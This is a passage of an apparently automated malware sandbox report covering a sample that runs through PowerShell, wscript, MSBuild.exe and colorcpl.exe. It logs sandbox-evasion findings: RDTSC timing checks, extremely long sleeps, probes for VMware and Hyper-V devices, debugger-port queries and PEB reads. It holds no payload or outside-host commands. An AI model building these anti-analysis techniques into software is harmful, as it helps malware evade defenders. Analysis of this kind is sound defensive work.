Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2F39904 second address: 2F3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2F39B6E second address: 2F39B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1258 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1961 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5194 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4510 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9837 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 1.9 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 2.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5756 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360 Thread sleep count: 5194 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep count: 4510 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316 Thread sleep time: -17524406870024063s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep count: 134 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep time: -268000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep count: 9837 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4888 Thread sleep time: -19674000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.2934766401.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000002.2938230118.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: wscript.exe, 00000000.00000003.1668064506.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1670550299.000001D6672C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000006.00000000.1812503144.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.2934766401.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000006.00000002.2938230118.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0040ACE0 LdrLoadDll, 5_2_0040ACE0
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h] 5_2_0137B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h] 5_2_0137B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h] 5_2_0137B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B136 mov eax, dword ptr fs:[00000030h] 5_2_0137B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01414144 mov eax, dword ptr fs:[00000030h] 5_2_01414144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01414144 mov eax, dword ptr fs:[00000030h] 5_2_01414144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01414144 mov ecx, dword ptr fs:[00000030h] 5_2_01414144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01414144 mov eax, dword ptr fs:[00000030h] 5_2_01414144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01414144 mov eax, dword ptr fs:[00000030h] 5_2_01414144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381131 mov eax, dword ptr fs:[00000030h] 5_2_01381131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381131 mov eax, dword ptr fs:[00000030h] 5_2_01381131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455152 mov eax, dword ptr fs:[00000030h] 5_2_01455152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01418158 mov eax, dword ptr fs:[00000030h] 5_2_01418158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B0124 mov eax, dword ptr fs:[00000030h] 5_2_013B0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01419179 mov eax, dword ptr fs:[00000030h] 5_2_01419179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 mov eax, dword ptr fs:[00000030h] 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01440115 mov eax, dword ptr fs:[00000030h] 5_2_01440115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142A118 mov ecx, dword ptr fs:[00000030h] 5_2_0142A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h] 5_2_0142A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h] 5_2_0142A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142A118 mov eax, dword ptr fs:[00000030h] 5_2_0142A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137C156 mov eax, dword ptr fs:[00000030h] 5_2_0137C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01387152 mov eax, dword ptr fs:[00000030h] 5_2_01387152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01386154 mov eax, dword ptr fs:[00000030h] 5_2_01386154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01386154 mov eax, dword ptr fs:[00000030h] 5_2_01386154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379148 mov eax, dword ptr fs:[00000030h] 5_2_01379148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379148 mov eax, dword ptr fs:[00000030h] 5_2_01379148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379148 mov eax, dword ptr fs:[00000030h] 5_2_01379148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379148 mov eax, dword ptr fs:[00000030h] 5_2_01379148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014461C3 mov eax, dword ptr fs:[00000030h] 5_2_014461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014461C3 mov eax, dword ptr fs:[00000030h] 5_2_014461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139B1B0 mov eax, dword ptr fs:[00000030h] 5_2_0139B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014551CB mov eax, dword ptr fs:[00000030h] 5_2_014551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h] 5_2_0137A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h] 5_2_0137A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A197 mov eax, dword ptr fs:[00000030h] 5_2_0137A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014561E5 mov eax, dword ptr fs:[00000030h] 5_2_014561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D7190 mov eax, dword ptr fs:[00000030h] 5_2_013D7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C0185 mov eax, dword ptr fs:[00000030h] 5_2_013C0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014271F9 mov esi, dword ptr fs:[00000030h] 5_2_014271F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B01F8 mov eax, dword ptr fs:[00000030h] 5_2_013B01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143C188 mov eax, dword ptr fs:[00000030h] 5_2_0143C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143C188 mov eax, dword ptr fs:[00000030h] 5_2_0143C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A51EF mov eax, dword ptr fs:[00000030h] 5_2_013A51EF
